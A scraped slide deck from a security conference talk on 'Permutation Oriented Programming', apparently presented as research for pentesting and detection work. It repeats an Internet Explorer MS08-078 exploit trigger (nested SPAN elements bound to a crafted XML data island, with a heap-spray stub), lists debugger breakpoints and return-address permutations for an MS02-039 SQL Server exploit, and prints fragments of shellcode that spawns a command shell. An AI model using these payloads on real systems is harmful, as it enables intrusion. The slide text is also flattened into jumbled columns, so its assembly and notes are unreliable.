memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
"ENG++: Permutation Oriented Programming" por Nelson Brito
Approach Unconditional Vulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary code Alternatives Detection Attack detection Alternatives? Permutation OP
MS02-039 POPed • SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8. • SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within • Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
MS08-078 POPed
MS08-078 POPed
MS08-078 POPed • CVE-2008-4844: “…crafted XML document • Data Consumer (HTML elements): containing nested <SPAN> elements”? I do not – According to MSDN (“Binding HTML think so… Elements to Data”) there are, at least, fifteen (15) bindable HTML elements • XML Data Island: available, but only five (5) elements are – There are two (2) options: using the useful. Dynamic HTML (DHTML) <XML> element – The HTML element is a key trigger, because within the HTML document or overloading it points to a dereferenced XML DSO, but the HTML <SCRIPT> element. it does not have to be the same HTML – Unfortunately, the HTML <SCRIPT> element to do so – it can be any mixed element is useless. HTML element. – But there are three (03) new alternatives to – 25 permutations. embedded a DSO. – 4 permutations. • Return address: – Uses “Heap Spray” technique, in this case • XML Data Source Object (DSO): the XML DSO handles the return address, and can use “.NET DLL” technique by Mark – Characters like “<” and “&” are illegal in Dowd and Alexander Sotirov (“How to <XML> element. To avoid errors <XML> Impress Girls with Browser Memory element can be defined as CDATA Protection Bypasses” – Black Hat USA, (Unparsed Character Data). But the <XML> 2008). element can be also defined as “&lt;” instead of “<”. – There are, at least, four (4) new possible return addresses. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations. – 4 permutations.
"ENG++: Permutation Oriented Programming" por Nelson Brito
Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
Shellcode Regular Hadoken (波動拳) shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
Shellcode Shoryuken (昇龍拳) FPU GetPC shell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2. shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
"ENG++: Permutation Oriented Programming" por Nelson Brito
What demo? NO DEMONSTRATION But you can test by yourselves!!!
What demo?
"ENG++: Permutation Oriented Programming" por Nelson Brito
Conclusions • Some examples, applying POP technique, will be • The POP technique is not part of any commercial or available. For further details, please refer to: public tool and is freely available, although the – http://about.me/nbrito examples were ported to work with Rapid7 Metasploit Framework – this is to show how flexible its approach and deployment is – hoping it can help people to • POP examples are licensed under GNU General understand the threat, improving their infra- Public License version 2. structure, security solutions and development approach. • The examples cover pretty old vulnerabilities, such as: – MS02-039: 3,307 days since published. • POP technique can be freely applied, there are no – MS02-056: 3,237 days since published. restrictions… No other than laziness. – MS08-078: 969 days since published. – MS09-002: 914 days since published. • POP technique can help different people, performing different tasks, such as: • POP is also not new: – Penetration-testing. – Encore-NG: 1,056 days since BUGTRAQ and – Exploit and proof-of-concept tools FULL-DISCLOSURE. development. – ENG++ : 622 days since H2HC 6th Edition. – Security solutions evaluation and tests. – Security solution Quality -Assurance . – Detection and protection mechanisms development. – Etc…
"ENG++: Permutation Oriented Programming" por Nelson Brito
Any questions?
Any questions?
"ENG++: Permutation Oriented Programming" por Nelson Brito

More Related Content

PDF
Permutation Oriented Programming: (Re)searching for alternatives!
Nelson Brito
 
PDF
Advanced Persistent Threats Cutting Through The Hype
Symantec
 
PPT
Proposal defense presentation
Ruchika Mehresh
 
PPTX
Webinar on identifying, preventing and securing against the unidentifiable at...
Intergence Ltd.
 
PDF
Massif cluster meeting
fcleary
 
PDF
"Cenário de Ameaças em 2011" por Mariano Miranda
SegInfo
 
PPTX
Midiakit seginfo v05
SegInfo
 
PDF
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
SegInfo
 
Permutation Oriented Programming: (Re)searching for alternatives!
Nelson Brito
 
Advanced Persistent Threats Cutting Through The Hype
Symantec
 
Proposal defense presentation
Ruchika Mehresh
 
Webinar on identifying, preventing and securing against the unidentifiable at...
Intergence Ltd.
 
Massif cluster meeting
fcleary
 
"Cenário de Ameaças em 2011" por Mariano Miranda
SegInfo
 
Midiakit seginfo v05
SegInfo
 
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
SegInfo
 

Viewers also liked (20)

PPTX
Ferramentas para Resposta a Incidentes - ago12
Luiz Sales Rabelo
 
PDF
Cuidados no processo pericial em tablets e smartphones
Data Security
 
PDF
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
SegInfo
 
PPTX
Guerra cibernética - Impacta
Luiz Sales Rabelo
 
PPT
Oficina Integradora - Daryus Impacta
Luiz Sales Rabelo
 
PPTX
Palestra MPDF BSB Mar/2012
Luiz Sales Rabelo
 
PPTX
Midiakit SegInfo 2015
SegInfo
 
PPTX
Processo investigativo - Faculdader Impacta
Luiz Sales Rabelo
 
PDF
A Miopia do CSO por Jordan Bonagura
SegInfo
 
PDF
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
SegInfo
 
PPTX
CNASI 2011
Luiz Sales Rabelo
 
PPTX
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Junior Abreu
 
PPTX
Palestra CGU - BSB Jan/2012
Luiz Sales Rabelo
 
PPTX
Convite de Patrocinio Workshop Seginfo 2013
SegInfo
 
PDF
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
SegInfo
 
PPTX
Começando um Pequeno & Grande Negócio
Junior Abreu
 
PPTX
Plano de captação SegInfo - 10a edição
SegInfo
 
PPTX
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Junior Abreu
 
PDF
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
SegInfo
 
PDF
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
SegInfo
 
Ferramentas para Resposta a Incidentes - ago12
Luiz Sales Rabelo
 
Cuidados no processo pericial em tablets e smartphones
Data Security
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
SegInfo
 
Guerra cibernética - Impacta
Luiz Sales Rabelo
 
Oficina Integradora - Daryus Impacta
Luiz Sales Rabelo
 
Palestra MPDF BSB Mar/2012
Luiz Sales Rabelo
 
Midiakit SegInfo 2015
SegInfo
 
Processo investigativo - Faculdader Impacta
Luiz Sales Rabelo
 
A Miopia do CSO por Jordan Bonagura
SegInfo
 
"Segurança na web: uma janela de oportunidades" por Lucas Ferreira
SegInfo
 
CNASI 2011
Luiz Sales Rabelo
 
Realidade Aumentada auxiliando na organização e interação aos Livros de Bibli...
Junior Abreu
 
Palestra CGU - BSB Jan/2012
Luiz Sales Rabelo
 
Convite de Patrocinio Workshop Seginfo 2013
SegInfo
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
SegInfo
 
Começando um Pequeno & Grande Negócio
Junior Abreu
 
Plano de captação SegInfo - 10a edição
SegInfo
 
Rede Sociais: Usando a Ferramenta Para o Seu Proveito
Junior Abreu
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
SegInfo
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
SegInfo
 
Ad

Similar to "ENG++: Permutation Oriented Programming" por Nelson Brito (20)

PDF
Vale Security Conference - 2011 - 13 - Nelson Brito
Vale Security Conference
 
PDF
[PH-Neutral 0x7db] Exploit Next Generation®
Nelson Brito
 
PDF
Vulnerability Management In An Application Security World
Denim Group
 
PPT
B-Sides Seattle 2012 Offensive Defense
Stephan Chenette
 
PDF
Dan Guido SOURCE Boston 2011
Source Conference
 
PDF
Inception: Tips and tricks I’ve learned reversing vulnerabilities!
Nelson Brito
 
PDF
Software Security Engineering (Learnings from the past to fix the future) - B...
DebasisMohanty43
 
PDF
11th Website Security Statistics -- Presentation Slides (Q1 2011)
Jeremiah Grossman
 
PPTX
Exploitation techniques and fuzzing
Prachi Gulihar
 
PPTX
